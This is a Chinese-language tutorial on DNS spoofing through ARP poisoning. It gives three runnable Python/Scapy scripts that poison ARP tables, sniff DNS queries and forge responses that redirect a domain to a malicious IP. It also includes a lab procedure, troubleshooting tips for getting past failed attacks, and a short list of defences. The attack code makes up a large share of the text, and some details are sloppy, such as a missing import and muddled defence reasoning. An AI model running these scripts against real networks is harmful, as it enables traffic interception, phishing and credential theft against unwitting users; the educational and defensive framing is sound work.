ARP欺骗技术：DNS欺骗与HTTP重定向_（5）.DNS欺骗技术概述

DNS欺骗技术概述

什么是DNS欺骗

DNS欺骗（DNS Spoofing）是一种网络攻击技术，攻击者通过篡改域名解析过程，将用户访问的合法域名指向恶意服务器的IP地址。这种攻击可以导致用户访问错误的网站，从而泄露敏感信息、遭受钓鱼攻击或下载恶意软件。DNS欺骗的核心在于利用DNS协议的漏洞，使用户的DNS查询返回错误的解析结果。

DNS协议简介

DNS（Domain Name System，域名系统）是互联网的一项核心服务，用于将人类可读的域名（如www.example.com）转换为计算机可识别的IP地址（如192.168.1.1）。DNS协议主要通过UDP（User Datagram Protocol）在53端口进行通信，也可以通过TCP在53端口进行通信。

DNS查询过程

1. 递归查询：客户端向递归DNS服务器（通常是ISP提供的DNS服务器）发送查询请求。

2. 迭代查询：递归DNS服务器向根DNS服务器、顶级域DNS服务器和权威DNS服务器发送查询请求，逐步获取目标域名的IP地址。

3. 缓存：DNS服务器会将解析结果缓存一段时间，以提高后续查询的效率。

DNS协议的特点

• 无连接：DNS查询通常使用UDP协议，不建立连接，因此速度快但不可靠。

• 非安全：DNS协议本身没有安全机制，容易受到中间人攻击。

• 缓存机制：DNS服务器会缓存解析结果，这可以提高查询效率，但也会导致缓存中毒。

DNS欺骗的工作原理

DNS欺骗主要通过以下几种方式实现：

1. ARP欺骗结合DNS欺骗

ARP欺骗（Address Resolution Protocol Spoofing）是一种局域网内的攻击技术，攻击者通过发送伪造的ARP响应，使网络中的设备将攻击者的MAC地址与目标设备的IP地址关联起来。结合ARP欺骗和DNS欺骗，攻击者可以控制局域网内的DNS解析过程。

实现步骤

1. ARP欺骗：攻击者发送伪造的ARP响应，使路由器或目标主机将攻击者的MAC地址与合法DNS服务器的IP地址关联起来。

2. 拦截DNS请求：攻击者通过控制网络流量，拦截客户端发送的DNS查询请求。

3. 伪造DNS响应：攻击者生成伪造的DNS响应，将合法域名解析为恶意服务器的IP地址。

4. 缓存中毒：攻击者可以通过伪造的DNS响应污染目标设备或DNS服务器的缓存，使后续的DNS查询继续返回错误的解析结果。

代码示例

以下是一个使用Scapy库在Python中实现ARP欺骗的示例代码：

from scapy.all import ARP, send, sr1, Ether, srp



# 定义目标IP和源IP

target_ip = "192.168.1.10"

source_ip = "192.168.1.1"



# 获取目标MAC地址

def get_mac(ip):

    arp_request = ARP(pdst=ip)

    broadcast = Ether(dst="ff:ff:ff:ff:ff:ff")

    arp_request_broadcast = broadcast / arp_request

    answered_list = srp(arp_request_broadcast, timeout=1, verbose=False)[0]

    return answered_list[0][1].hwsrc



# 发送ARP欺骗包

def spoof(target_ip, source_ip):

    target_mac = get_mac(target_ip)

    arp_response = ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=source_ip)

    send(arp_response, verbose=False)



# 恢复网络

def restore(target_ip, source_ip):

    target_mac = get_mac(target_ip)

    source_mac = get_mac(source_ip)

    arp_response = ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=source_ip, hwsrc=source_mac)

    send(arp_response, count=4, verbose=False)



# 持续发送ARP欺骗包

try:

    while True:

        spoof(target_ip, source_ip)

        spoof(source_ip, target_ip)

        time.sleep(2)

except KeyboardInterrupt:

    restore(target_ip, source_ip)

    restore(source_ip, target_ip)

2. 缓存中毒

缓存中毒是指攻击者通过伪造的DNS响应，污染DNS服务器的缓存，使后续的DNS查询继续返回错误的解析结果。这种攻击通常发生在递归DNS服务器上。

实现步骤

1. 监听DNS请求：攻击者监听网络中的DNS查询请求。

2. 伪造DNS响应：攻击者生成伪造的DNS响应，将合法域名解析为恶意服务器的IP地址。

3. 发送伪造响应：攻击者在网络中发送伪造的DNS响应，使递归DNS服务器将伪造的解析结果缓存起来。

代码示例

以下是一个使用Scapy库在Python中实现DNS缓存中毒的示例代码：

from scapy.all import *



# 定义目标域名和恶意IP

target_domain = "www.example.com"

malicious_ip = "10.0.0.1"



# 监听DNS请求并伪造响应

def dns_spoof(pkt):

    if pkt.haslayer(DNS) and pkt.getlayer(DNS).qr == 0:  # 检查是否为DNS查询

        if target_domain in pkt.getlayer(DNS).qd.qname.decode("utf-8"):

            # 构造伪造的DNS响应

            ip = IP(dst=pkt[IP].src, src=pkt[IP].dst)

            udp = UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)

            dns = DNS(id=pkt[DNS].id, qr=1, qd=pkt[DNS].qd, an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=malicious_ip))

            spoofed_pkt = ip / udp / dns

            send(spoofed_pkt, verbose=False)

            print(f"Sent spoofed DNS response for {target_domain} to {malicious_ip}")



# 开始监听DNS请求

sniff(filter="udp port 53", prn=dns_spoof)

3. DNS缓存刷新

DNS缓存刷新是指攻击者通过频繁发送伪造的DNS响应，使目标设备或DNS服务器的缓存频繁更新，从而达到持续欺骗的效果。这种攻击通常需要结合ARP欺骗。

实现步骤

1. ARP欺骗：攻击者通过ARP欺骗控制网络流量。

2. 频繁发送伪造响应：攻击者通过频繁发送伪造的DNS响应，使目标设备或DNS服务器的缓存不断被更新。

代码示例

以下是一个结合ARP欺骗和DNS缓存刷新的Python示例代码：

from scapy.all import *

import time



# 定义目标IP、源IP、目标域名和恶意IP

target_ip = "192.168.1.10"

source_ip = "192.168.1.1"

target_domain = "www.example.com"

malicious_ip = "10.0.0.1"



# 获取目标MAC地址

def get_mac(ip):

    arp_request = ARP(pdst=ip)

    broadcast = Ether(dst="ff:ff:ff:ff:ff:ff")

    arp_request_broadcast = broadcast / arp_request

    answered_list = srp(arp_request_broadcast, timeout=1, verbose=False)[0]

    return answered_list[0][1].hwsrc



# 发送ARP欺骗包

def spoof(target_ip, source_ip):

    target_mac = get_mac(target_ip)

    arp_response = ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=source_ip)

    send(arp_response, verbose=False)



# 恢复网络

def restore(target_ip, source_ip):

    target_mac = get_mac(target_ip)

    source_mac = get_mac(source_ip)

    arp_response = ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=source_ip, hwsrc=source_mac)

    send(arp_response, count=4, verbose=False)



# 发送伪造的DNS响应

def send_spoofed_dns(pkt):

    if pkt.haslayer(DNS) and pkt.getlayer(DNS).qr == 0:  # 检查是否为DNS查询

        if target_domain in pkt.getlayer(DNS).qd.qname.decode("utf-8"):

            # 构造伪造的DNS响应

            ip = IP(dst=pkt[IP].src, src=pkt[IP].dst)

            udp = UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)

            dns = DNS(id=pkt[DNS].id, qr=1, qd=pkt[DNS].qd, an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=malicious_ip))

            spoofed_pkt = ip / udp / dns

            send(spoofed_pkt, verbose=False)

            print(f"Sent spoofed DNS response for {target_domain} to {malicious_ip}")



# 持续发送ARP欺骗包

try:

    while True:

        spoof(target_ip, source_ip)

        spoof(source_ip, target_ip)

        sniff(filter="udp port 53", prn=send_spoofed_dns, count=1, timeout=2)

except KeyboardInterrupt:

    restore(target_ip, source_ip)

    restore(source_ip, target_ip)

DNS欺骗的防御方法

1. DNSSEC

DNSSEC（DNS Security Extensions）是一种扩展协议，通过数字签名验证DNS响应的完整性和真实性。DNSSEC可以防止DNS响应被篡改，从而提高DNS解析的安全性。

2. 缓存时间设置

通过缩短DNS缓存的有效时间，可以减少缓存中毒的风险。管理员可以在DNS服务器上设置较短的TTL（Time To Live）值。

3. 使用安全的DNS服务器

选择信誉良好的DNS服务器，如Google Public DNS（8.8.8.8）或Cloudflare DNS（1.1.1.1），这些服务器通常有更强的安全措施。

4. 网络监控

通过网络监控工具检测异常的DNS流量，及时发现并阻止DNS欺骗攻击。

5. 链路加密

使用TLS（Transport Layer Security）或HTTPS加密DNS查询，防止中间人攻击。

实际案例分析

案例1：局域网内的ARP欺骗和DNS欺骗

假设在一个局域网内，攻击者通过ARP欺骗将路由器的MAC地址与自己的IP地址关联起来，从而控制网络流量。攻击者监听DNS查询请求，发现目标主机正在查询www.example.com的IP地址，攻击者生成伪造的DNS响应，将www.example.com解析为10.0.0.1。目标主机收到伪造的响应后，访问10.0.0.1，而10.0.0.1是一个恶意服务器，可以进行钓鱼攻击或传播恶意软件。

案例2：公共Wi-Fi网络中的DNS缓存中毒

在一个公共Wi-Fi网络中，攻击者通过监听DNS查询请求，发现多个设备正在查询www.example.com的IP地址。攻击者生成伪造的DNS响应，将www.example.com解析为10.0.0.1，并在网络中广播这些伪造的响应。递归DNS服务器收到伪造的响应后，将解析结果缓存起来。后续的设备在查询www.example.com时，会从缓存中获取错误的解析结果，访问恶意服务器。

工具和软件

1. Scapy

Scapy是一个强大的Python库，可以用于创建、发送、捕获和解析网络数据包。在DNS欺骗攻击中，Scapy可以用于构建和发送伪造的DNS响应。

2. Ettercap

Ettercap是一个图形化的中间人攻击工具，支持ARP欺骗和DNS欺骗。通过Ettercap，攻击者可以轻松地进行ARP欺骗，监听网络流量，并伪造DNS响应。

3. Wireshark

Wireshark是一个网络协议分析工具，可以捕获和分析网络流量。通过Wireshark，攻击者可以监听DNS查询请求，分析请求的内容，从而生成伪造的DNS响应。

实践操作

实验环境搭建

1. 安装必要的工具：确保安装了Python、Scapy、Ettercap和Wireshark。

2. 配置网络环境：搭建一个局域网环境，包含客户端、路由器和DNS服务器。

3. 开启防火墙和安全设置：确保实验环境与外部网络隔离，避免造成实际危害。

实验步骤

1. 启动ARP欺骗：使用Scapy或Ettercap进行ARP欺骗，控制网络流量。

2. 监听DNS请求：使用Wireshark或Scapy监听DNS查询请求。

3. 伪造DNS响应：生成伪造的DNS响应，将合法域名解析为恶意服务器的IP地址。

4. 验证攻击效果：在客户端上进行域名解析，验证是否返回了恶意服务器的IP地址。

5. 恢复网络：停止ARP欺骗，恢复网络正常状态。

实验结果分析

通过实验，可以验证DNS欺骗攻击的原理和效果。分析实验结果时，注意以下几点：

• ARP表：检查目标主机和路由器的ARP表，确保MAC地址与IP地址的关联已被篡改。

• DNS缓存：检查目标设备或DNS服务器的缓存，确保解析结果已被污染。

• 网络流量：使用Wireshark分析网络流量，查看伪造的DNS响应是否被成功发送和接收。

常见问题及解决方案

1. ARP欺骗失败

• 原因：目标设备或路由器可能有ARP表锁定功能，无法被篡改。

• 解决方案：尝试使用 Ettercap 进行更复杂的ARP欺骗，或选择其他目标设备。

2. DNS响应未被拦截

• 原因：目标设备可能使用了安全的DNS服务器，如DNSSEC。

• 解决方案：选择信誉较差的DNS服务器，或尝试其他攻击方法，如DNS缓存刷新。

3. 缓存中毒未成功

• 原因：目标设备的DNS缓存时间设置较短，频繁更新缓存。

• 解决方案：增加伪造DNS响应的发送频率，或使用更复杂的缓存中毒技术。

结论

DNS欺骗是一种常见的网络攻击技术，通过篡改DNS解析过程，使用户访问错误的网站。本文详细介绍了DNS欺骗的工作原理、实现方法和防御措施。通过实验，读者可以深入了解DNS欺骗的机制，并学会如何防御这种攻击。希望本文对网络安全领域的专业人士有所帮助。